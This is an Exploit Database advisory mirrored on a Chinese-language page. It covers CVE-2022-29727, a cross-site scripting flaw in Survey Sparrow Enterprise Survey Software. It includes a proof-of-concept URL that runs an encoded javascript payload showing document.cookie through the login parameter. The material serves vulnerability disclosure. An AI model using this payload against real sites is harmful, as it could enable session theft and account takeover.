Survey Sparrow Enterprise Survey Software 2022 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 15 阅读

• 作者： Pankaj Kumar Thakur
  日期： 2022-05-17
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50937/

• # Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
  # Date: May 11 2022
  # Exploit Author: Pankaj Kumar Thakur
  # Vendor Homepage: https://surveysparrow.com/
  # Software Link: https://surveysparrow.com/enterprise-survey-software/
  # Version: 2022
  # Tested on: Windows
  # CVE : CVE-2022-29727
  # References:
  https://www.tenable.com/cve/CVE-2022-29727
  https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
  
  #POC
  
  For Stored XSS
  
  Visit
  https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
  
  XSS Executed